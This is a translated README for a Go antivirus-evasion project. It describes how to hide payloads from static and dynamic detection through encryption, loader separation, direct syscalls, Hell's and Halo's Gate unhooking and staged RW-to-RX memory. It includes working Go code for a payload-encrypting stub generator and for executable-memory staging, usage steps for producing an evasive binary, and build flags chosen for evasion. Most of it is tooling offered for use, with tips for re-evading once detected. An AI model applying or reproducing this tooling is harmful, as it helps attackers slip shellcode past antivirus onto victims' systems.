
safe6Sec / GolangBypassAV

Licence: MIT license
Research on the various ways Golang can be used to bypass AV



GolangBypassAV

Research on using Golang to bypass AV

Preface

AV evasion has never been a web guy's strong suit, and as a web guy there is no need to spend too much time on it: good enough to use is enough. Don't chase evasion of every product; evading the target's AV is all that matters.

Notes

  • If you are interested in this project, the suggested order of study is:
    1. Start with the test directory; it holds simple, common things.
    2. After the test directory, look at the bypass directory, which holds the various evasion techniques.
    3. If you only want to use the tool, go straight to the gen directory.

Evasion approach

Static

Static evasion is comparatively simple: either encrypt the payload or separate it from the loader.
Core idea:
Removing the signatures is enough to pass static scanning. Some AV products also include a sandbox, so anti-sandbox measures have to be considered as well.
Beyond that, the following are options (they pull in the net package, which makes the file considerably larger, so I have not tested them):

  • Host the payload on a remote server and fetch it at runtime
  • Hide the payload with steganography
  • Put the shellcode in a custom section; in short, any form of separation
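Added example, not the project's own gen code: a minimal generator in Go showing what "encrypt the payload" means in practice. It reads a payload file, seals it with AES-256-GCM under a freshly drawn key, and writes a stub source file that embeds only the key and the ciphertext, so no byte of the clear payload is present in anything that reaches disk. The names EncryptPayload, DecryptPayload and RenderStubSource and the stub template are mine; the project's real generator and its key handling are not reproduced here.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"io"
	"os"
)

// newGCM builds the AES-GCM AEAD; key must be 16, 24 or 32 bytes.
func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptPayload seals payload under key. The random nonce is prepended so the
// same key can be reused across builds, and the GCM tag makes a wrong key or a
// corrupted blob fail loudly instead of feeding garbage to the loader.
func EncryptPayload(payload, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, payload, nil), nil
}

// DecryptPayload is what the generated stub does at startup: the clear
// payload only ever exists in memory, never in the file on disk.
func DecryptPayload(sealed, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	n := gcm.NonceSize()
	if len(sealed) < n {
		return nil, fmt.Errorf("sealed blob too short (%d bytes)", len(sealed))
	}
	return gcm.Open(nil, sealed[:n], sealed[n:], nil)
}

// stubTemplate is the emitted program (hypothetical, my own). It stops at
// "payload decrypted in memory"; what happens to the bytes next is the
// dynamic side of evasion. %#v renders a []byte as a valid Go literal.
const stubTemplate = `package main

import (
	"crypto/aes"
	"crypto/cipher"
)

var key = %#v
var sealed = %#v

func main() {
	block, _ := aes.NewCipher(key)
	gcm, _ := cipher.NewGCM(block)
	n := gcm.NonceSize()
	payload, err := gcm.Open(nil, sealed[:n], sealed[n:], nil)
	if err != nil {
		panic(err) // wrong key or tampered blob
	}
	_ = payload // hand the clear bytes to whatever loader you use
}
`

// RenderStubSource embeds only the key and the ciphertext, so no byte of the
// clear payload appears in the artifact written to disk.
func RenderStubSource(sealed, key []byte) string {
	return fmt.Sprintf(stubTemplate, key, sealed)
}

func must(err error) {
	if err != nil {
		panic(err)
	}
}

// Usage: gen <payload.bin> <stub.go>; a fresh 32-byte key is drawn per build.
func main() {
	payload, err := os.ReadFile(os.Args[1])
	must(err)
	key := make([]byte, 32)
	_, err = io.ReadFull(rand.Reader, key)
	must(err)
	sealed, err := EncryptPayload(payload, key)
	must(err)
	must(os.WriteFile(os.Args[2], []byte(RenderStubSource(sealed, key)), 0o644))
}
```

Build the emitted stub with the build commands listed later on this page. Because the key sits next to the ciphertext in the same binary, this defeats byte-pattern signatures on the payload only; the stub's own code and data can become the signature over time, which is why the author advises changing the key (and any flagged keywords) before each use.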

Dynamic

The fewer sensitive APIs the better: registry operations, adding startup items, adding services, adding users, injection, hijacking, process creation, DLL loading and so on.
Core idea:

  • Find some way to get the shellcode loaded into memory.
  • Use direct system calls with the syscall number (sysid)
  • Unhook sensitive APIs, e.g. Hell's Gate, or a second load of a fresh copy of the DLL
  • Split sensitive operations into steps: for example, allocate memory as read/write (rw) first, then change its protection to executable. Do not request read/write/execute (rwx) memory from the start.
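Added example, not code from the project: the staged allocation of the last bullet, written with the POSIX mmap/mprotect calls so it runs outside Windows. On Windows the same two steps are VirtualAlloc with PAGE_READWRITE followed by VirtualProtect to PAGE_EXECUTE_READ (both wrapped in golang.org/x/sys/windows). The region is requested read/write, filled, then flipped to read/execute; read/write/execute is never requested. StageExecutable, Release and RegionPerms are names I chose, the sample bytes are constructed and never executed, and RegionPerms reads /proc/self/maps, so that check is Linux-only.

```go
//go:build !windows

package main

import (
	"bufio"
	"fmt"
	"os"
	"strconv"
	"strings"
	"syscall"
	"unsafe"
)

// StageExecutable maps a page-aligned region read/write, copies payload into
// it, then flips it to read/execute. At no point is PROT_WRITE|PROT_EXEC
// requested together. The returned slice is backed by the mapping; free it
// with Release.
func StageExecutable(payload []byte) ([]byte, error) {
	if len(payload) == 0 {
		return nil, fmt.Errorf("empty payload")
	}
	page := os.Getpagesize()
	size := (len(payload) + page - 1) / page * page
	mem, err := syscall.Mmap(-1, 0, size,
		syscall.PROT_READ|syscall.PROT_WRITE, syscall.MAP_PRIVATE|syscall.MAP_ANON)
	if err != nil {
		return nil, fmt.Errorf("mmap rw: %w", err)
	}
	copy(mem, payload)
	if err := syscall.Mprotect(mem, syscall.PROT_READ|syscall.PROT_EXEC); err != nil {
		syscall.Munmap(mem)
		return nil, fmt.Errorf("mprotect rx: %w", err)
	}
	return mem, nil
}

// Release unmaps a region returned by StageExecutable.
func Release(mem []byte) error { return syscall.Munmap(mem) }

// RegionPerms returns the kernel's own view of the mapping containing mem by
// parsing /proc/self/maps (Linux only), so the staging is verified rather than
// trusted. A private anonymous read/execute region shows as "r-xp".
func RegionPerms(mem []byte) (string, error) {
	addr := uint64(uintptr(unsafe.Pointer(&mem[0])))
	f, err := os.Open("/proc/self/maps")
	if err != nil {
		return "", err
	}
	defer f.Close()
	sc := bufio.NewScanner(f)
	for sc.Scan() {
		fields := strings.Fields(sc.Text())
		if len(fields) < 2 {
			continue
		}
		bounds := strings.SplitN(fields[0], "-", 2)
		if len(bounds) != 2 {
			continue
		}
		lo, err1 := strconv.ParseUint(bounds[0], 16, 64)
		hi, err2 := strconv.ParseUint(bounds[1], 16, 64)
		if err1 != nil || err2 != nil {
			continue
		}
		if addr >= lo && addr < hi {
			return fields[1], nil
		}
	}
	return "", fmt.Errorf("address %#x not found in /proc/self/maps", addr)
}

func main() {
	// Constructed sample bytes: staged into the region but never called.
	mem, err := StageExecutable([]byte("constructed sample, never executed"))
	if err != nil {
		panic(err)
	}
	defer Release(mem)
	perms, err := RegionPerms(mem)
	if err != nil {
		panic(err)
	}
	fmt.Println("staged region protection:", perms)
}
```

The point of reading the protection back from /proc/self/maps is that a loader which "meant" to stage RW then RX but silently fell through to RWX looks identical from inside the program; checking the kernel's view is how you confirm the allocation pattern you actually produced.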

Usage

For now the project only builds on Windows!

The default payload location is C:\Users\Administrator\Desktop\payload.bin
Run the command below to generate the evasive binary (game.exe)

With an explicit payload:
main.exe payload.bin

Without specifying a payload, just run:
main.exe

Updates

2022.1.13 Studied and added Halo's Gate evasion. Works great.

2021.8.29 Improved the generation command; signatures no longer have to be edited by hand. Everything is now generated dynamically: just specify the payload to produce an evasive binary.
The source is in the gen directory.
The generated binary shows a message box by default; if you don't want it, modify the source yourself.

2021.8.24
Generate directly with the code in the gen directory; a demo video has been posted on the WeChat public account. Evasion has reached its goal, so updates will slow down.
Note: it is recommended to change the key by hand before each use; if the binary gets detected, changing the keywords is enough.

Build commands

Best evasion result, but the largest file
go build main.go

With the race flag the file is even larger than the plain build, and the evasion result is poor
go build -ldflags="-s -w" -o main1.exe -race main.go

Commonly used build command: good evasion, smaller file (-s strips the symbol table, -w omits DWARF debug info)
go build -ldflags="-s -w" -o main1.exe

Commonly used build command: average evasion, smaller file plus no console window
go build -ldflags="-s -w -H=windowsgui" -o main2.exe

Setting the target platform explicitly (cmd.exe takes one variable per set):
set GOOS=windows
set GOARCH=amd64
go build -o main.exe

The same build from a POSIX shell:
GOOS=windows GOARCH=amd64 go build -o main.exe
